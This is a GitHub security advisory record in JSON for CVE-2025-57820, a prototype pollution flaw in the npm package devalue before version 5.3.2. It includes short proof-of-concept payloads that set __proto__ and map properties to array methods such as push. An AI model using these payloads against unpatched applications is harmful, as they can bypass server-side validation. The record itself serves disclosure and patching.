{"id":"GHSA-vj54-72f3-p5jv","summary":"devalue prototype pollution vulnerability","details":"## 1. `devalue.parse` allows `__proto__` to be set\n\nA string passed to `devalue.parse` could represent an object with a `__proto__` property, which would assign a prototype to an object while allowing properties to be overwritten:\n\n```js\nclass Vector {\n  constructor(x, y) {\n    this.x = x;\n    this.y = y;\n  }\n\n  get magnitude() {\n    return (this.x ** 2 + this.y ** 2) ** 0.5;\n  }\n}\n\nconst payload = `[{\"x\":1,\"y\":2,\"magnitude\":3,\"__proto__\":4},3,4,\"nope\",[\"Vector\",5],[6,7],8,9]`;\n\nconst vector = devalue.parse(payload, {\n  Vector: ([x, y]) =\u003e new Vector(x, y)\n});\n\nconsole.log(\"Is vector\", vector instanceof Vector); // true\nconsole.log(vector.x) // 3\nconsole.log(vector.y) // 4\nconsole.log(vector.magnitude); // \"nope\" instead of 5\n```\n\n## 2. `devalue.parse` allows array prototype methods to be assigned to object\n\nIn a payload constructed with `devalue.stringify`, values are represented as array indices, where the array contains the 'hydrated' values:\n\n```js\ndevalue.stringify({ message: 'hello' }); // [{\"message\":1},\"hello\"]\n```\n\n`devalue.parse` does not check that an index is numeric, which means that it could assign an array prototype method to a property instead:\n\n```js\nconst object = devalue.parse('[{\"toString\":\"push\"}]');\nobject.toString(); // 0\n```\n\nThis could be used by a creative attacker to bypass server-side validation.","aliases":["CVE-2025-57820"],"modified":"2025-08-27T14:27:08Z","published":"2025-08-26T22:33:14Z","database_specific":{"cwe_ids":["CWE-1321"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2025-08-26T22:33:14Z","nvd_published_at":"2025-08-26T23:15:35Z"},"references":[{"type":"WEB","url":"https://github.com/sveltejs/devalue/security/advisories/GHSA-vj54-72f3-p5jv"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-57820"},{"type":"WEB","url":"https://github.com/sveltejs/devalue/commit/0623a47c9555b639c03ff1baea82951b2d9d1132"},{"type":"PACKAGE","url":"https://github.com/sveltejs/devalue"}],"affected":[{"package":{"name":"devalue","ecosystem":"npm","purl":"pkg:npm/devalue"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"5.3.2"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-vj54-72f3-p5jv/GHSA-vj54-72f3-p5jv.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"}]}